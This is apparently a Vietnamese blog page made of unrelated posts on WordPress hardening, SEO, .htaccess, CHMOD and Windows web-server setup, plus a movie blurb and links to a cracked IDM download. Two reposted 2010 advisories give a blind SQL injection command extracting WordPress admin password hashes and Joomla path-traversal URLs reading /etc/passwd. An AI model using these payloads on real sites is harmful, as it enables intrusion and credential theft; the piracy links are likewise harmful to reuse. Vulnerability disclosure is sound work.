Welcome
Hi vọng bạn có những giây phút thực sự hữu ích tại KyoVn Blog
Hãy đăng ký làm thành viên để thấy sự khác biệt
Một chút kiến thức và kinh nghiệm nhỏ, hôm nay xin hướng dẫn bảo mật WordPress.Bao gồm CHMOD,giấu file config,mã hóa,thông tin user admin.
1./ Vấn đề Chmod:
a. Chmod thư mục public_html thành 710 và các thư mục còn lại thành 701, một số thư mục không quan trọng hoặc bắt buộc thì chmod 755 (một số bắt 777), việc này sẽ giúp bạn bảo vệ được cấu trúc Website của mình.
b. Chmod tập tin wp-config.php và các file liên quan wp-load.php và wp-settings.php thành 400, điều này chống hacker local và view source của tập tin này
2./ Vấn đề giấu file wp-config.php và các file liên quan.
a. Giấu file wp-config.php
- File config là file chứa tất cả những gì quan trọng nhất, vì vậy việc làm cho hacker không view đc source của file này rất quan trọng.
Sau khi đổi tên và đổi đường dẫn file config, các bạn tìm file wp-load.php và edit.
Các bạn tìm trong file wp-load.php dòng này
if ( file_exists( ABSPATH . ‘wp-config.php’) ) {
/** The config file resides in ABSPATH */
require_once( ABSPATH . ‘wp-config.php’ );
} elseif ( file_exists( dirname(ABSPATH) . ‘/wp-config.php’ ) && ! file_exists( dirname(ABSPATH) . ‘/wp-settings.php’ ) ) {
/** The config file resides one level above ABSPATH but is not part of another install*/
require_once( dirname(ABSPATH) . ‘/wp-config.php’ );
Edit cho phù hợp.
b. Giấu file wp-load.php
Tìm trong file wp-login.php dòng này
Đang tìm cách để giấu link admin. Cách tốt nhất hiện tại là đặt pass cho folder wp-admin, cách khác để tìm hiểu rồi update sau.
3./ Vấn đề mã hoá
Các cách mã hoá tốt nhất hiện nay là mã hoá sang IonCube và ZendGuard 5
Mã hoá file wp-config.php bằng ZendGuard 5 sẽ khó mà giải mã được (khó không có nghĩa là không thể )
4./ Thông tin Admin
Thường thì wp mặc địch user của quản trị viên là admin và không thay đổi được, điều này làm cho các hacker chỉ cần đoán pass, việc cần làm là thay đổi tên admin.
Các bạn vào phpmyadmin và edit lại, có thể edit, muốn nhanh thì dùng lệnh SQL
update wp_users set user_login=”tên bạn muốn đổi đê login”, user_nicename=”tên bạn thích”, display_name=”tên bạn muốn đổi để hiển thị” where ID=1;
Khuyến cáo không nên để user_login, user_nicename và display_name trùng nhau vì như thế hacker vẫn có thể biết user của bạn.
Quảng bá doanh nghiệp là một trong những hoạt động thiết yếu trong kinh doanh vì nó giúp thu hẹp khoảng cách giữa doanh nghiệp và khách hàng. Với sự ra đời của Internet, quảng bá doanh nghiệp trên web là một hình thức mới nhưng có thể đem lại hiệu quả cao do tính phổ dụng và chí phí thấp của nó.Lấy một ví dụ đơn giản, nếu bạn quảng bá trên Internet, người dùng khắp nơi trên thế giới và trong nước đều có thể biết đến, trong khi nếu quảng bá trên báo giấy thông thường, phạm vi sẽ bị thu hẹp rất nhiều nếu kinh phí hạn hẹp. Quảng bá trên Internet có nhiều dạng, hoặc là bạn trả tiền cho các website có nhiều người truy cập vào để đặt thông tin của bạn ở đó, hoặc là bạn tự thiết lập website và quảng bá website đó thông qua các máy tìm kiếm. Ở cách làm thứ hai, bạn ko phải tốn tiền nhưng để các máy tìm kiếm có thể “nhìn thấy” website của bạn và xếp hạng website của bạn cao (đồng nghĩa với cơ hội được nhiều người quan tâm), bạn cần phải biết một số thủ thuật sau:
1. Đăng kí website với máy tìm kiếm
Để website của bạn nằm trong kết quả trả về của một máy tìm kiếm, trước tiên nó phải được bộ phận thu thập thông tin của máy tìm kiếm “thấy”. Vì có rất nhiều trang web mới ra đời và được cập nhật trên Internet, bên cạnh việc để bộ phận này “thấy”, còn phải đảm bảo nó thu thập thông tin từ website của bạn càng sớm càng tốt. Lấy một ví dụ trang web của bạn chuyên cung cấp thông tin bình luận về Euro, nếu sau đó vài ngày bài bình luận về trận đấu tối qua mới được máy tìm kiếm xử lí thì lúc đó tính cập nhật thông tin sẽ không còn nữa.
Có nhiều cách để giúp máy tìm kiếm “thấy”, đơn giản nhất là đăng kí website của bạn vào các thư mục web như ODP (Open Directory Project) hoặc là sử dụng Google WebMaster Tool. Với việc sử dụng Google WebMaster Tool, bạn sẽ được đảm bảo rằng website của bạn sẽ được Google thu thập thông tin thường xuyên.
2. Làm nổi bật các từ khóa liên quan trong tiêu đề và mô tả của trang web
Khi một người dùng tìm thông tin trên Internet thông qua các máy tìm kiếm, họ thường dùng từ khóa, ví dụ họ muốn mua máy giặt thì họ sẽ gõ “máy giặt” vào ô tìm kiếm. Nếu công ty của bạn kinh doanh mặt hàng này, bạn cần phải “báo” cho máy tìm kiếm biết điều này để máy tìm kiếm có thể đưa website của công ty bạn vào danh sách kết quả trả về cho người dùng. Cách đơn giản nhất để báo cho máy tìm kiếm biết điều này là phải đặt danh sách các từ khóa liên quan trong trang web của bạn. Hai vị trí thông dụng nhất đó là tiêu đề và mô tả trang web. Thủ thuật này tuy đơn giản nhưng lại có không ít website không để ý. Hãy xem một ví dụ về một tin mà BBC và TTOL đưa, http://www.tuoitre.com.vn/Tianyon/Index.aspx?ArticleID=269494&ChannelID=2 và http://news.bbc.co.uk/2/hi/americas/7516063.stm
. Nhìn vào tiêu đề sẽ thấy BBC có thêm thông tin về bài báo, trong khi TTOL thì không.
3. Tăng thứ tự xếp hạng
Với mỗi yêu cầu tìm kiếm của người dùng, máy tìm kiếm có thể tìm ra được rất nhiều trang web được cho là phù hợp với người dùng. Để có cơ hội được người dùng quan tâm, trang web của bạn cần phải được xếp thứ hạng cao trong kết quả trả về (thông thường phải nằm trong top 10 hoặc 20 – tương đương với trang đầu tiên của kết quả tìm kiếm). Để xếp hạng các trang web, các máy tìm kiếm hiện nay sử dụng tiêu chí phổ dụng (popularity). Tính phổ dụng bao gồm 2 phần, phần thứ nhất là số lượng các trang liên kết đến trang của bạn, và phần thứ hai là chất lượng của các trang liên kết đến trang của bạn. Nếu trang web của bạn được các site có tiếng tăm (authoritive sites) liên kết đến, nó sẽ có thứ hạng cao hơn trang không có site nào liên kết đến hoặc nhiều site không tiếng tăm liên kết đến. Ví dụ nếu trang web của bạn được các site như BBC hay CNN liên kết đến thì đảm bảo nó sẽ được xếp hạng rất cao.
Việc được các site có tiếng tăm liên kết đến đòi hỏi site của bạn phải có chất lượng, điều mà chỉ có thể đạt được qua thời gian dài. Cách đơn giản nhất là nhắm vào số lượng các site liên kết đến trang web của bạn trước. Để làm điều này, blog cá nhân mà một sự lựa chọn hợp lí. Khi blog của bạn có bài viết về chủ đề nóng bỏng nào đó, nó sẽ dễ dàng được mọi người quan tâm, và từ đó đặt các liên kết đến. Bằng cách này, bạn sẽ tăng giá trị cho blog cá nhân của bạn. Hệ quả là khi bạn đặt liên kết từ blog cá nhân của bạn đến website công ty của mình, nó sẽ giúp làm tăng thứ tự xếp hạng website đó.
Nói một cách tóm tắt, các thủ thuật trên bao gồm các bước: thứ nhất, cung cấp thông tin cho máy tìm kiếm để đảm bảo thông tin của bạn nằm trong cơ sở dữ liệu của máy tìm kiếm; thứ hai, làm nổi bật các đặc trưng của bạn để để máy tìm kiếm có thể đưa trang web của bạn vào danh sách phù hợp với yêu cầu tìm kiếm của người dùng; và thứ ba là tăng thứ tự xếp hạng để đảm bảo trang web của bạn được người dùng chọn trong danh sách đầu tiên được máy tìm kiếm trả về.
Một vấn đề mà khi lám SEO cho blog wordpress chúng ta rất đau đầu đó là phần url của blog wordpess luồn tồn lại những kí từ tiếng việt, dạng như thế này:
http://www.example.com/2009/05/b%e1%ba%a3n-ki%e1%bb%83m-di%e1%bb%83m/
lý do là vì cấu hình của wordpress không có chức năng tự chuyển đổi các từ tiếng việt về kí tự latinh dạng như Â = a.
Friendly URL được giải quyết rất gọn gàng trong joomla và drupal, những wordpress thì không, đây có lẻ là 1 điểm yếu của wordpress.
Vấn đề này nếu không được giải quyết ngay từ đầu thì chắc chắn bạn sẻ tốn rất nhiều thời gian về sau, hoặc là phải trọn luôn giải pháp cho hiển thị url kiêu như vậy và bỏ qua phần tối ưu hóa url cho SEO này.
Hiện nay đã có Plugin hỗ trợ việc chuyển URL tiếng Việt thành không dấu.
Plugin tên là Nicer permalinks for Vietnamese
Việc cài đặt tương đối đơn giản, chỉ cần upload file np4v.php lên thư mục /wp-content/plugins/ sau đó kích hoạt plugin này trong admin cpanel.
Lưu ý plugin này chi hoạt động đối với những bài viết được viết sau khi đã cài đặt plugin, những bài viết cũ sẻ được liệt vào 404 , các bạn nên lưu ý cài đặt plugin này đầu tiên nhé.
Giới thiệu về file .htaccess
File .htaccess hầu hết được dùng để đặt mật khẩu cho web site của bạn. ví dụ. nếu tôi muốn dùng mật khẩu để bảo vệ site http://domain.com/secrect/ Tôi có thể tạo một file gọi là .htaccess trong folder secret nằm trên server đó. Ngoài ra file .htaccess còn dùng để từ chối việc liệt kê file trong folder. Điều này rất tiện khi bạn không có file index ví dụ. images/ cgi-bin/ db/ .
Có rất nhiều tùy chọn cho bạn đặt vào file .htaccess. Ở đây tôi chỉ đề cập đến ‘AuthConfig’ và ‘Limit’.
QUAN TRỌNG: File .htaccess hoạt động trong toàn bộ cây thư mục. Ví dụ. nếu bạn có một file .htaccess trong /www/.htaccess thì nó sẽ có tác dụng đến /www/public/, /www/pictures, v.v.. Nếu bạn chỉ muốn không cho liệt kê thư mục trong /www/pictures thì đặt file .htaccess vào /www/pictures chứ KHÔNG phải vào /www !
Có một tùy chọn khác với thẻ
Việc đầu tiên là phải tạo một file gọi là .htpasswd để chứa username và mật khẩu (đừng lo lắng gì, chúng đã được mã hóa). Có nhiều cách tạo mật khẩu mã hóa. Cách dễ nhất là vào http://www.euronet.nl/~arnow/htpasswd/ tạo một cái. Sau đó bạn copy/paste dòng kết quả vào file .htpasswd. Tiếp theo ta tạo file .htaccess. Ví dụ như sau:
AuthUserFile /home/leon/secret/.htpasswd AuthGroupFile /dev/null AuthName “My .htaccess secured web page!” AuthType Basic require valid-user
Dòng đầu tiên là nơi bạn chứa file .htpasswd. Những dòng còn lại chắc bạn cũng đã hiểu!
Từ chối ip:Nếu bạn muốn cấm (block) vài ip hay isp thì đặt một trong những dòng sau vào file .htaccess:
order allow,deny deny from 123.45.67.89 deny from 45.67.89. allow from all
Nó sẽ cấm 123.45.67.89 và mọi ip bắt đầu với 45.67.89.
Bên cạnh đó bạn cũng có thể làm như sau:
order deny,allow deny from all allow from 123.45.67.8
Nó sẽ cấm tất cả IP ngoại trừ 123.45.67.8
Ngoài ra bạn có thể tham khảo thêm ở:
http://httpd.apache.org/docs/howto/htaccess.html
http://wsabstract.com/howto/htaccess.shtml
http://www.he.net/faq/tutorials/htaccess/demo.html
http://www.freewebmasterhelp.com/tutorials/htaccess/
http://baremetal.com/gadgets/htaccess/
http://tools.dynamicdrive.com/password/
CHMOD định nghĩa đơn giản chính là cụm từ viết tắt của Change Mode – Một lệnh đặc biệt chỉ dùng trên các máy chủ hệ Unix (Linux, Solaris, True64…) dùng để thay đổi quyền lực của một người bất kỳ đối với một tập tin, thư mục bất kỳ trên một website cụ thể. Bằng cách thay đổi chmod, bạn đồng thời gán một quyền lực cho một người nào đó đối với các tập tin, thư mục trong cấu trúc website của bạn.
Giá trị chmod luôn được biểu thị bằng một cụm gồm 3 chữ số (***) đại diện cho 3 người gồm: User (Owner – Chủ sở hửu) – Group (Nhóm cộng tác) – Other (Guest – Tất cả mọi người còn lại) và gồm các giá trị gồm 1 (Execute – Thực thi), 2 (Write – Ghi), 4 (Read – Đọc)
Ví dụ 1: chmod: Chủ sở hửu : 1 – Nhóm cộng tác : 2 – Mọi người : 4
Chủ sở hửu có quyền gọi thực thi tập tin, thư mục
Nhóm cộng tác có quyền ghi nội dung vào tập tin, thư mục
Mọi người có quyền xem nội dung tập tin, thư mục
Ví dụ 2: chmod: 412 Chủ sở hửu : 4 – Nhóm cộng tác : 1 – Mọi người : 2
Chủ sở hửu có quyền xem nội dung tập tin, thư mục
Nhóm cộng tác có quyền gọi thực thi tập tin, thư mục
Mọi người có quyền ghi nội dung vào tập tin, thư mục
CHMOD 644, 666, 755, 777 là như thế nào?
Như trên đã trình bày, các giá trị chmod luôn là 1, 2, 4. Điều này đồng nghĩa với việc nếu bạn muốn cấp nhiều quyền lực hơn cho một người bất kỳ đối với tập tin, thư mục của bạn, bạn sẽ phải cộng các số lại với nhau. Kết quả ta sẽ có các giá trị:
1 = Quyền gọi thực thi
2 = Quyền ghi nội dung
3 = 1 + 2 = Quyền gọi thực thi + Quyền ghi nội dung
4 = Quyền xem nội dung
5 = 4 + 1 = Quyền xem nội dung + Quyền gọi thực thi
6 = 4 + 2 = Quyền xem nội dung + Quyền ghi nội dung
7 = 4 + 2 + 1 = Quyền xem nội dung + Quyền ghi nội dung + Quyền gọi thực thi
Như vậy, khi bạn có giá trị 7, quyền lực của bạn sẽ là tuyệt đối đối với tập tin, thư mục đó. Và ngược lại, khi bạn có giá trị 1, bạn sẽ có quyền lực thấp nhất.
Và cũng như trên đã nói, chmod không đứng riêng lẻ mà luôn đi thành cụm 3 chữ số để biểu thị cho quyền lực của User – Group – Other. Kết quả ta có các giá trị:
111, 112, 113, 114, 115, 116, 117, 121, 122, 123, 124, 125, 126, 127, 131, 132, 133, 134, 135, 136, 137, 141, 142, 143, 144, 145, 146, 147, 151, 152, 153, 154, 155, 156, 157, 161, 162, 163, 164, 165, 166, 167, 171, 172, 173, 174, 175, 176, 177, 211, 212, 213, 214, 215, 216, 217, 221, 222, 223, 224, 225, 226, 227, 231, 232, 233, 234, 235, 236, 237, 241, 242, 243, 244, 245, 246, 247, 251, 252, 253, 254, 255, 256, 257, 261, 262, 263, 264, 265, 266, 267, 271, 272, 273, 274, 275, 276, 277, 311, 312, 313, 314, 315, 316, 317, 321, 322, 323, 324, 325, 326, 327, 331, 332, 333, 334, 335, 336, 337, 341, 342, 343, 344, 345, 346, 347, 351, 352, 353, 354, 355, 356, 357, 361, 362, 363, 364, 365, 366, 367, 371, 372, 373, 374, 375, 376, 377, 411, 412, 413, 414, 415, 416, 417, 421, 422, 423, 424, 425, 426, 427, 431, 432, 433, 434, 435, 436, 437, 441, 442, 443, 444, 445, 446, 447, 451, 452, 453, 454, 455, 456, 457, 461, 462, 463, 464, 465, 466, 467, 471, 472, 473, 474, 475, 476, 477, 511, 512, 513, 614, 515, 516, 517, 521, 522, 523, 524, 525, 526, 527, 531, 532, 533, 534, 535, 536, 537, 541, 542, 543, 544, 545, 546, 547, 551, 552, 553, 554, 555, 556, 557,, 561, 562, 563, 564, 565, 566, 567, 571, 572, 573, 574, 575, 576, 577, 611, 612, 613, 614, 615, 616, 617, 621, 622, 623, 624, 625, 626, 627, 631, 632, 633, 634, 635, 636, 637, 641, 642, 643, 644, 645, 646, 647, 651, 652, 653, 654, 655, 656, 657, 661, 662, 663, 664, 665, 666, 667, 671, 672, 673, 674, 675, 676, 677, 711, 712, 713, 714, 715, 716, 717, 721, 722, 723, 724, 725, 726, 727, 731, 732, 733, 734, 735, 736, 737, 741, 742, 743, 744, 745, 746, 747, 751, 752, 753, 754, 755, 756, 757, 761, 762, 763, 764, 765, 766, 767, 771, 772, 773, 774, 775, 776, 777
Tất cả các giá trị trên đều là giá trị đúng cho CHMOD và đương nhiên bạn có quyền gán các giá trị này lên tập tin, thư mục bất kỳ trong cấu trúc website của bạn.
Theo mặc định của đại đa số các server, sau khi bạn upload file, các file này sẽ được gán giá trị 644 tức User có quyền Xem, ghi nội dung, Group và Other chỉ có quyền xem. CHMOD 666 sẽ cho phép mọi người có quyền xem và ghi nội dung vào tập tin, thư mục đó. CHMOD 755 thường được gán cho các chương trình CGI (Các file .cgi, .pl) để cho phép các chương trình này hoạt động. CHMOD 777 cho phép mọi người có toàn quyền trên tập tin, thư mục.
Trong hầu hết trường hợp, tác giả các chương trình CGI, PHP sẽ hướng dẫn bạn cách chmod tập tin, thư mục để chương trình có thể hoạt động chính xác. Nếu gặp lỗi, hãy liên hệ với quản trị server nơi bạn host website để được trợ giúp do mỗi server sẽ có thể có những cách config khác nhau.
Làm sao gán giá trị chmod?
Một số chương trình quản lý file qua giao diện web có tính năng thay đổi CMOD. Tuy nhiên, bạn không nên chmod file bằng các chương trình này mà thay vào đó, hãy chmod file qua FTP. Chương trình quản lý file qua FTP được đề nghị sử dụng là CuteFTP Pro, hay LeapFTP. Sau khi upload file lên server, bạn chỉ việc nhấn chuột phải lên tên file, chọn mục Change Attributes / CHMOD và nhập các giá trị tương ứng vào ô trống hoặc đánh dấu chọn giá trị và nhấn OK
============================================= - - Release date: May 10th, 2010 - - Discovered by: Danilo Massa - - Severity: High ============================================= I. VULNERABILITY - ------------------------- Events Manager Wordpress plugin <= 2.1 Blind SQL Injection II. BACKGROUND - ------------------------- Events Manager 2.0 is a full-featured event management solution for Wordpress. Events Manager supports recurring events, locations data, RSVP and maps. With Events Manager you can plan and publish your tour, or let people reserve spaces for your weekly meetings. You can then add events list, calendars and description to your blog using a sidebar widget or shortcodes; if you’re web designer you can simply employ the template tags provided by Events Manager. III. INTRODUCTION - ------------------------- Events Manager versions 2.0rc2 and 2.1 have a blind sql injection when a single event page is shown to the users. No authentication required. IV. DESCRIPTION - ------------------------- Input passed via the "event_id" parameter to the admin defined event page is not properly sanitised before being used in a SQL query. This happen in the events-manager.php file in the following lines (version 2.1): 436: $event_ID = dbem_sanitize_request($_REQUEST ['event_id']); 534: $event_ID = dbem_sanitize_request($_REQUEST ['event_id']); The dbem_sanitize_request only quote sql reserved characters and do not force event_id parameter to be an integer number. V. PROOF OF CONCEPT - ------------------------- Below is a harmless test that can be executed on the page that show a single event. http://<wordpress_site>/<event_page>?event_id=<existing_event_id>%20and%201=1 http://<wordpress_site>/<event_page>?event_id=<existing_event_id>%20and%201=0 a more complex test case can be executed using Blind Sql Injection Brute Forcer version 2:  ./bsqlbf-v2-4.pl -url http://<wordpress_site>/<event_page>?event_id=<existing_event_id> -blind event_id -sql "(SELECT concat(user_login,0x3a,user_pass) from wp_users limit 0,1)" -database 1 -type 0 -match "<string_in_existing_event_web_page>" getting the first user in the Wordpress database and its password hash. VI. BUSINESS IMPACT - ------------------------- An attacker could exploit the vulnerability to retrieve any data from databases accessible by Wordpress db user. VII. SYSTEMS AFFECTED - ------------------------- Versions 2.0rc2 and 2.1 are vulnerable. Versions <= 2.0rc2 could be vulnerable. VIII. SOLUTION - ------------------------- Upgrade to a patched release (>= 2.2) or as quick workaround put a  settype($event_ID, "int"); just after lines listed in the DESCRIPTION section. IX. REFERENCES - ------------------------- http://davidebenini.it/wordpress-plugins/events-manager/ http://davidebenini.it/blog/
Joomla Custom PHP Pages Component LFI Vulnerability
=====================================================
- Discovered by : Chip D3 Bi0s
- Email : chipdebios@gmail.com
- Date : 2010-05-11
- Where : From Remote
———————————-
Affected software description
Application : Joomla Custom PHP Pages Component
Developer : Gabe
Email : gabe@fijiwebdesign.com
Type : Non-Commercial
License : GPL
Date Added : 6 June 2008
Download : http://joomla-php.googlecode.com/files/com_php0.1alpha1-J15.tar.gz
I. BACKGROUND
Joomla PHP Pages Component allows you to create simple PHP pages
and link them to the Joomla Menu. This allows you to easily create
a custom page without having to create a whole component. It is
similar to the PHP Module for Joomla, except that it is a full Component.
II. DESCRIPTION
Some LFI vulnerabilities exist in Joomla Custom PHP Pages Component.
III. ANALYSIS
The bug is in the following files, specifying the lines
/components/com_php/php.php
[35] $filename = $Params->get(‘file’, ”);
[36] $path = JPATH_ROOT.’/components/com_php/files/’.$filename;
…
[47] // evaluate the PHP
[48] echo ‘<div>’;
[49] if (is_file($path)) {
[50] include($path);
[51] } else {
[52] echo ‘<span>Please choose a File</span>’;
Explaining the above lines:
According to the code that files are opened, but the code is not
shows no filtration, so we can move into
directories. According to several extensions can be observed as
.html, .jpg, .js, which is not true of all .php
IV. EXPLOITATION
http://127.0.0.1/index.php?option=com_php&file=../images/phplogo.jpg
http://127.0.0.1/index.php?option=com_php&file=../js/ie_pngfix.js
http://127.0.0.1/index.php?option=com_php&file=../../../../../../../../../../etc/passwd
Joomla Custom PHP Pages Component LFI Vulnerability=====================================================
- Discovered by : Chip D3 Bi0s- Email : chipdebios@gmail.com- Date : 2010-05-11- Where : From Remote
———————————-Affected software description
Application : Joomla Custom PHP Pages Component Developer : GabeEmail : gabe@fijiwebdesign.comType : Non-CommercialLicense : GPLDate Added : 6 June 2008Download : http://joomla-php.googlecode.com/files/com_php0.1alpha1-J15.tar.gz
I. BACKGROUND
Joomla PHP Pages Component allows you to create simple PHP pagesand link them to the Joomla Menu. This allows you to easily createa custom page without having to create a whole component. It issimilar to the PHP Module for Joomla, except that it is a full Component.
II. DESCRIPTION
Some LFI vulnerabilities exist in Joomla Custom PHP Pages Component.
III. ANALYSIS
The bug is in the following files, specifying the lines
/components/com_php/php.php
[35] $filename = $Params->get(‘file’, ”);[36] $path = JPATH_ROOT.’/components/com_php/files/’.$filename; …[47] // evaluate the PHP[48] echo ‘<div>’;[49] if (is_file($path)) {[50] include($path);[51] } else {[52] echo ‘<span>Please choose a File</span>’;
Explaining the above lines:According to the code that files are opened, but the code is notshows no filtration, so we can move intodirectories. According to several extensions can be observed as.html, .jpg, .js, which is not true of all .php
IV. EXPLOITATION
http://127.0.0.1/index.php?option=com_php&file=../images/phplogo.jpghttp://127.0.0.1/index.php?option=com_php&file=../js/ie_pngfix.jshttp://127.0.0.1/index.php?option=com_php&file=../../../../../../../../../../etc/passwd
Sản Xuất:Jack Giarraputo, Steve Golin, Nancy Juvonen
Diễn viên: Adam Sandler, Drew Barrymore,
Rob Schneider, Sean Astin, Dan Aykroyd
Mỗi một ngày là mối tình đầu. Henry là một bác sĩ động vật. Anh đã tình cơ gặp một cô gái tại quán ăn, Lucy. Cả hai đều gặp tiếng sét ai tình. Nhưng Lucy là một cô gái đặc biệt. Cô bị tai nạn và ảnh hưởng tới bộ não. Cô sẽ quên hết mọi thứ diễn ra trong vòng 24 tiếng đồng hồ. Mỗi người của cuộc đời cô là một sự bắt đầu mới, mọi thứ cứ lặp đi lặp lại. Henry sẽ phải đối diện thế nào với Lucy người anh yêu say đắm. Một mối tình sâu đậm. Liệu Lucy có chấp nhận Henry không? Cô sẽ như thế nào khi biết sự thật về bệnh tật của mình? Mối tình của họ sẽ như thế nào? Mời các bạn đón xem.
Phần 1:
ZD YouTube FLV Player
Phần 2 :
ZD YouTube FLV Player
Phần 3 :
ZD YouTube FLV Player
Phần 4 :
ZD YouTube FLV Player
Phần 5 :
ZD YouTube FLV Player
Gởi các bác bản IDM full ^ ^
Đây là bản IDM 5.19 Build 1 full
http://www.mediafire.com/?jtmz43mwjfz
Còn đây là bản IDM 5.18 Build 4 full
http://www.mediafire.com/?yzakcwyelhk
Các bác nhớ khi sài có hiện thông báo update thì đừng update ^ ^ sẽ sài vô tư, vì em đang sài chạy ầm ầm
Tình hình là có mấy bro mua server or vps win về ko biết dùng cứ pm em hỏi nên em viết bài này . cũng chả phải tut nhưng mà ko biết để ở box nào thì em cho vào đây
Đầu tiên để có thể chạy đc web server thì ta cần chọn 1 os để chạy …. ở đây ta chọn apache + php để dịch ngôn ngữ php + mysql . Để làm ftp server thì ta cần zFtpServer suite.
Bước 1 : cài đặt web server chạy php
Để cài apache php mysql ( nên kèm cả phpmyadmin ) thì ta có thể có nhiều lựa chọn về bộ kit sẵn có ( Vertrigo serv, Appserv , Wamp , Xamp ….. ) hoặc có thể cài đặt thủ công .
ở đây thì cài bộ Kit cho tiện nhá … lựa chọn vertrigo đi cho nó nhẹ nhàng ( tuy ko mạnh = appserv hay nhiều cái khác ) .
Down vertrigo : http://vertrigo.sourceforge.net/
Cài đặt như bt .. ai ko biết cài nữa thì chịu luôn . bó tay chấm mắm tôm
Vào phpmyadmin để tạo database cho mình … user: root , pass: vertrigo thi phai
=======================================
Thế là đã xong phần tạo web server
Bước 2: Add nhiều domain vào web server
Ví dụ webserver có 2 ip là : 203.172.0.1 và 203.172.0.8
và bạn muốn chạy 3 site là www.site1.com , www.site2.com và www.site3.com trong đó www.site1.com dùng ip 203.172.0.1 còn 2 site www.site2.com và www.site3.com dùng chung ip 203.172.0.8
Vào thư mục www của Vertrigo tạo ra 3 folder mới với tên site1, site2 ,site3 (đặt tên như nào tuỳ ý …..ví dụ ở đây thư mục www là ở C:/www thì link của 3 folder trên là C:\www\site1 , C:\www\site2 . C:\www\site3 )
===> mở file httpd.conf của apache ra … xuống dưới cuối cùng của file thêm vào các cụm virtual host thêm bao nhiêu cũng đc .. tuỳ số tên miền muốn add
như ở ví dụ thì ta thêm vào lần lượt như sau
www.site1.com chạy ở folder C:\www\site1 và dùng riêng ip 203.172.0.1 thì ta thêm vào
<VirtualHost 203.172.0.1>DocumentRoot “C:/www/site1″ServerName www.site1.com</VirtualHost>( Nên thay \ của win = / của unix )
xong site 1 bi h ta thêm site2 và site3 với :
www.site2.com chạy ở folder C:\www\site2 , www.site3.com chạy ở folder C:\www\site3 và cả 2 dùng chung địa chỉ ip : 203.172.0.8
—> thêm vào như sau:
NameVirtualHost 203.172.0.8<VirtualHost 203.172.0.8>DocumentRoot “C:/www/site2″ServerName www.site2.com</VirtualHost><VirtualHost 203.172.0.8>DocumentRoot “C:/www/site3″ServerName www.site3.com</VirtualHost>
Sau khi thêm ta save file httpd.cof lại rồi ta trỏ các domain:
www.site1.com trỏ ip về 203.172.0.1
www.site2.com trỏ ip về 203.172.0.8
www.site3.com trỏ ip về 203.172.0.8
Rồi restart lại Apache ( vertrigo ko có restart riêng vì vậy ta chọn restart server cho nhanh )
Sau khi restart lại thì mọi ng đã hoàn thành add nhiều domain vào webserver rồi .. khi nào cần thêm hay xoá thì mọi ng lại mở httpd.conf ra sửa –> save –> restart lại apache là xong .
================================================== =======
Xong bước 2 .
Bước 3: Tạo ftp server :
Lên google search và down zFtpserver Suite về … mọi người có thể buy license hoặc dùng bản freeware của nó ( freeware chỉ hỗ trợ ftp có license thì cả sftp …. đều đc hỗ trợ ) .
Cài đặt zFtpServer Suite xong thì bật lên rồi vào biểu tượng User Account –> Add user … chọn user và pass cho acc ftp … ví dụ ở đây muốn tạo acc site1 pass 123456 để sửa các file trong thư mục C:\www\site1 thì ta để username : site1 , pass 12345 . trỏ chuột xuống phần textare phía dưới ( chỗ cái khung trắng é ) chọn Add Resource —> chọn đến folder ta muốn acc truy nhập đến ở đây là C:\www\site1 . sau đó đánh dấu vào các quyền read write … với folder này ( mấy chữ v mầu đỏ é ) . rồi chọn ok .
Tắt Windows Firewall đi hoặc vào Windows Firewall add thêm port 20,21 vào phần Exception , Cho phép truy cập qua cổng 20 và 21 là ok
Done … bạn đã có 1 webserver hoàn chỉnh rồi đấy .
Friend Logo
